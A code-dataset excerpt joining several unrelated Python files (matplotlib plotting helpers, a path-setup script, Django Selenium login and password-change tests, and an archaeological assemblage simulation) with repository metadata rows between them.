cmap=None, vmin=None, vmax=None, interpolation='none',
xlabel=None, ylabel=None):
cma = plt.cm.get_cmap('viridis')
nx = grid.shape[0]
ny = grid.shape[1]
#need to rearrange the array order for imshow to match the same x and y values as is assumed with input thickness_grid
grid_swapped = np.zeros((ny,nx), dtype=grid.dtype)
for i in range(ny):
if i < nx:
ii = ny-i - 1
for j in range(nx):
if j < nx:
grid_swapped[i,j] = grid[j,ii]
for i in range(nx):
if i < ny:
ii = nx - i - 1
for j in range(ny):
if j < ny:
grid_swapped[i, j] = grid[j, ii]
if vmin is not None and vmax is None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
if colorbar:
cbar = plt.colorbar()
if colorbarlabel is not None:
cbar.ax.set_ylabel(colorbarlabel)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_ebar_hists(center_count_err, name_list=None, filename='ebar_hist.eps',
save=True, show=False, xlabel=None, ylabel='Counts'):
"""Generic plotting function for (multiple) xy datasets.
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00',
'#cc33ff', '#33ccff', '#009999', '#996633',
'#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
i = 0
for cce in center_count_err:
if name_list is not None:
plt.errorbar(cce[0], cce[1], yerr=cce[2], marker=next(_marker),
drawstyle='steps-mid', color=next(_colors),
label=name_list[i])
else:
plt.errorbar(cce[0], cce[1], yerr=cce[2], marker=next(_marker),
drawstyle='steps-mid', color=next(_colors))
i += 1
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
lgd = None
if name_list is not None:
#lgd = plt.legend(loc=7)
if len(name_list) > 3:
lgd = plt.legend(loc="center left", bbox_to_anchor=(1.04, 0.5))
else:
lgd = plt.legend(loc=0)
plt.tight_layout()
if save:
if lgd is not None:
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
else:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_spark(xdat,ydat,filename='plot.eps', save=True, show=False, color='#47d147'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
ax.fill_between(xdat, ydat, min(ydat), alpha=0.1, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_spark_multi(xdats,ydats,filename='plot.eps', save=True, show=False, colors=None):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
nsets = len(xdats)
for i in range(nsets):
xdat = xdats[i]
ydat = ydats[i]
try:
color = colors[i]
except:
color = next(_colors)
ax.plot(xdat, ydat, color=color, marker=next(_marker), linestyle='-')
ax.fill_between(xdat, ydat, min(ydats[2]), alpha=0.2, color=color)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_spark_error(xdat,ydat, error, filename='plot.eps', save=True, show=False, color='#47d147'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
ydat = np.array(ydat)
error = np.array(error)
ax.fill_between(xdat, ydat-error, min(ydat-error), alpha=0.1, color=color)
ax.fill_between(xdat, ydat+error, ydat-error, alpha=0.25, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_spark_marker(xdat,ydat,filename='plot.eps', save=True, show=False, color='#47d147', marker='s'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color, marker=marker, markersize=40)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
ax.fill_between(xdat, ydat, min(ydat), alpha=0.1, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_spark_error_marker(xdat,ydat, error, filename='plot.eps',
save=True, show=False, color='#47d147',
marker='s'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
# _colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
# _marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color, marker=marker, markersize=40)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
ydat = np.array(ydat)
error = np.array(error)
ax.fill_between(xdat, ydat-error, min(ydat-error), alpha=0.1, color=color)
ax.fill_between(xdat, ydat+error, ydat-error, alpha=0.25, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
| 39.761329 | 157 | 0.563696 | 9,196 | 65,805 | 3.906046 | 0.065355 | 0.015813 | 0.016787 | 0.011693 | 0.810496 | 0.789143 | 0.764143 | 0.750028 | 0.734994 | 0.717121 | 0 | 0.026165 | 0.312347 | 65,805 | 1,654 | 158 | 39.785369 | 0.767629 | 0.282623 | 0 | 0.728122 | 1 | 0 | 0.050143 | 0.004776 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028037 | false | 0 | 0.009346 | 0 | 0.08921 | 0.002549 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3e4908d88580e139c3ff59a4cc61348df289caf1 | 273 | py | Python | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | import sys
sys.path.append("/home/gangserver/dev/data")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/test")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/exam")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/doit")
| 39 | 71 | 0.772894 | 45 | 273 | 4.688889 | 0.355556 | 0.132701 | 0.246446 | 0.322275 | 0.881517 | 0.881517 | 0.739336 | 0.739336 | 0.739336 | 0.739336 | 0 | 0 | 0.025641 | 273 | 6 | 72 | 45.5 | 0.793233 | 0 | 0 | 0 | 0 | 0 | 0.663004 | 0.663004 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
e415a6780e4c5916c0343e4a534b33c87c27d049 | 14,896 | py | Python | mutadi/members/tests/test_chrome.py | etiennody/mutadi | 23b15c0fc19e183f4e5602488748e912e6077cb2 | [
"MIT"
] | 1 | 2021-02-03T18:48:50.000Z | 2021-02-03T18:48:50.000Z | mutadi/members/tests/test_chrome.py | achrafbouzekri/mutadi | 14c0cd6a55423c6710b5b595f7d0d442f78f7765 | [
"MIT"
] | 7 | 2021-06-01T14:34:13.000Z | 2022-03-12T00:58:31.000Z | mutadi/members/tests/test_chrome.py | achrafbouzekri/mutadi | 14c0cd6a55423c6710b5b595f7d0d442f78f7765 | [
"MIT"
] | 1 | 2021-02-03T18:48:38.000Z | 2021-02-03T18:48:38.000Z | """Functional tests for members app"""
import time
import urllib.parse
import pytest
from django.contrib.auth import get_user_model
from django.test import LiveServerTestCase
from model_bakery import baker
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
pytestmark = pytest.mark.django_db
User = get_user_model()
class TestRegisterSelenium(LiveServerTestCase):
"""Selenium functional tests for user registration."""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_register_page(self):
"""Register page should redirect to login page after sign up validation."""
url = urllib.parse.urljoin(self.live_server_url, "/members/register/")
self.driver.get(url)
username = self.driver.find_element(By.ID, "id_username")
first_name = self.driver.find_element(By.ID, "id_first_name")
last_name = self.driver.find_element(By.ID, "id_last_name")
email = self.driver.find_element(By.ID, "id_email")
password1 = self.driver.find_element(By.ID, "id_password1")
password2 = self.driver.find_element(By.ID, "id_password2")
submit = self.driver.find_element(By.CLASS_NAME, "btn")
time.sleep(5)
self.driver.implicitly_wait(5)
username.send_keys("BobRobert")
first_name.send_keys("Bob")
last_name.send_keys("Robert")
email.send_keys("bobrobert@test.com")
password1.send_keys("fglZfYmr%?,9")
password2.send_keys("fglZfYmr%?,9")
submit.click()
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (self.live_server_url, "/members/login")
assert "Se connecter" in self.driver.page_source
assert self.driver.page_source
class TestLoginSelenium(LiveServerTestCase):
"""Selenium functional tests for user login."""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
self.proto_user = baker.make(User)
self.proto_user.set_password("m=9UaK^C,Tbq9N=T")
self.proto_user.save()
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_login_page(self):
"""Login page shoud redirect to home page after sign in validation."""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s" % (self.live_server_url)
assert "Accueil :: Mutadi" in self.driver.title
class TestChangePasswordSelenium(LiveServerTestCase):
"""Selenium functional tests for user chenge password process"""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
self.proto_user = baker.make(User)
self.proto_user.set_password("m=9UaK^C,Tbq9N=T")
self.proto_user.save()
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_change_password_page(self):
"""Validate data entries on the change password page"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("%h2KtHFJ_%JY")
new_password2.send_keys("%h2KtHFJ_%JY")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/change_password_success",
)
assert "Mot de passe modifié :: Mutadi" in self.driver.title
assert (
"Votre mot de passe a été modifié avec succès !"
in self.driver.page_source
)
def test_invalid_live_change_password_with_personal_information(self):
"""Unvalidate data entries on the change password page with personal information"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys(self.proto_user.username)
new_password2.send_keys(self.proto_user.username)
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Le mot de passe est trop semblable "
"au champ « nom d’utilisateur »."
) in self.driver.page_source
def test_invalid_live_change_password_with_only_number(self):
"""Unvalidate data entries on the change password page with only number"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("12345678")
new_password2.send_keys("12345678")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Ce mot de passe est entièrement numérique."
in self.driver.page_source
)
def test_invalid_live_change_password_with_short_entries(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("Q=3")
new_password2.send_keys("Q=3")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Ce mot de passe est trop court. "
"Il doit contenir au minimum 8 caractères."
) in self.driver.page_source
def test_invalid_live_change_password_with_differents_new_passwords(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("tbf:[D=5")
new_password2.send_keys("kOx`Y{nM")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Les deux mots de passe ne correspondent pas."
in self.driver.page_source
)
def test_invalid_live_change_password_with_wrong_old_password(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9123")
new_password1.send_keys("kOx`Y{nM")
new_password2.send_keys("kOx`Y{nM")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Votre ancien mot de passe est incorrect. "
"Veuillez le rectifier."
) in self.driver.page_source
| 41.493036 | 91 | 0.651114 | 1,957 | 14,896 | 4.743996 | 0.100664 | 0.138949 | 0.078414 | 0.117622 | 0.839832 | 0.821952 | 0.801056 | 0.790392 | 0.77165 | 0.767019 | 0 | 0.015573 | 0.219723 | 14,896 | 358 | 92 | 41.608939 | 0.783016 | 0.048805 | 0 | 0.746575 | 0 | 0 | 0.151049 | 0.014602 | 0 | 0 | 0 | 0 | 0.061644 | 1 | 0.047945 | false | 0.280822 | 0.034247 | 0 | 0.10274 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
e4954c4e5393dd1b7f021adc455d5c9d168156a6 | 7,587 | py | Python | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | simulate_assemblages.py | acabaniss/py-simulated-assemblage | 9b307abd5143a2561327b118b0fda99db7ee6870 | [
"MIT"
] | null | null | null | """Generate simulated assemblages and compare simulation vs. observed artifacts.
Author: Andrew Cabaniss
"""
import numpy as np
import scipy
import matplotlib.pyplot as plt
import random as rd
def simulate_assemblages_collection(context_counts, N = 10000, p_dist = 2, center = 'observed'):
"""Calculate a theoretical object-assemblage matrix with similar marginal probabilities for an entire site.
Parameters
----------
context_counts :pandas.DataFrame
Rows need to be the contexts, columns need to be integer counts of objects
N : int
number of theoretical assemblages to generate
p_dist : int
Dimensions for the Minkowski distance: 1 for Manhattan/taxi-cab, 2 for Euclidian
center : {'observed', 'calculated'}
If observed: the mean of all simulated distributions is used
If calculated: the expected mean is used instead.
Returns
-------
results : dict
The results dict stores different data from the simulation:
1. raw_simulation - the numpy.array of the simulated assemblages
2. raw_observed - the formatted observed data as a numpy.array
3. distance_simulation - the distances from the center of the simulated distribtion
4. distance_observed - the distance of our actual assemblage from the center of the simulated distribution
5. p-value - the proportion of simulated assemblages further from the center than the observed assemblages
6. N - number of assemblages generated
7. p_dist - dimensionality of the distance used
8. center - the center chosen for distances to be calculated from
"""
# Value checks
if center not in ['observed', 'calculated']:
raise ValueError("center neither 'observed' nor 'calculated")
#First, the observed data are formatted and used to construct the parameters for a weighted random distribution
observed = np.asanyarray(context_counts) #convert from DataFrame to ndarray
num_objects = observed.sum().sum() #total number of objects across all contexts/types
num_contexts = observed.shape[0] # number of contexts
num_types = observed.shape[1] #number of different types of objects
marginal_types = observed.sum(axis = 0)*1./num_objects #marginal distribution of the types of objects
marginal_contexts = observed.sum(axis = 1)*1./num_objects #marginal distribution of the contexts
#generate simulated assemblages
collector = np.zeros((N,num_contexts,num_types))
for i in range(N):
for o in range(num_objects):
x = rd.choices(range(num_contexts),weights = marginal_contexts)
y = rd.choices(range(num_types),weights = marginal_types)
collector[i,x,y] += 1
#Determine the center to be used for measuring all distances
if center == 'calculated':
center_calc = np.outer(marginal_contexts, marginal_types)*num_objects #calculate the theoretical center of the distribution
elif center == 'observed':
center_calc = collector.mean(axis = 0) #calculate the actual center of teh distribution
#prepare the distribution, observed data, and center of teh distribution for distance calculation
center_calc_flat = center_calc.reshape(1,-1) #reshape to be flat for distances
collector_flat = np.reshape(collector,(N, -1)) #reshape to be flat for distances
data_flat = np.asanyarray(observed).reshape(1, -1) #reshape to be flat for distances
#calculate distances within the simulated distribution
dists_boot = scipy.spatial.distance_matrix(center_calc_flat, collector_flat, p = p_dist).flatten()
dist_real = scipy.spatial.distance_matrix(center_calc_flat, data_flat , p = p_dist).flatten()[0]
#return results
result = {'raw_simulation' : collector,
'raw_observed' : observed,
'distance_simulation' : dists_boot,
'distance_observed' : dist_real,
'p-value' : sum(dists_boot>=dist_real)*1./len(dists_boot),
'N' : N,
'p_dist' : p_dist,
'center' : center}
return result
def simulate_assemblage_single(context_counts, context_index, N = 10000, p_dist = 2, center = 'observed'):
"""Calculate a theoretical object-assemblage matrix with similar marginal probabilities for an entire site.
Parameters
----------
context_counts :pandas.DataFrame
Rows need to be the contexts, columns need to be integer counts of objects
context_index : int
which row needs to be used
N : int
number of theoretical assemblages to generate
p_dist : int
Dimensions for the Minkowski distance: 1 for Manhattan/taxi-cab, 2 for Euclidian
center : {'observed', 'calculated'}
If observed: the mean of all simulated distributions is used
If calculated: the expected mean is used instead.
Returns
-------
results : dict
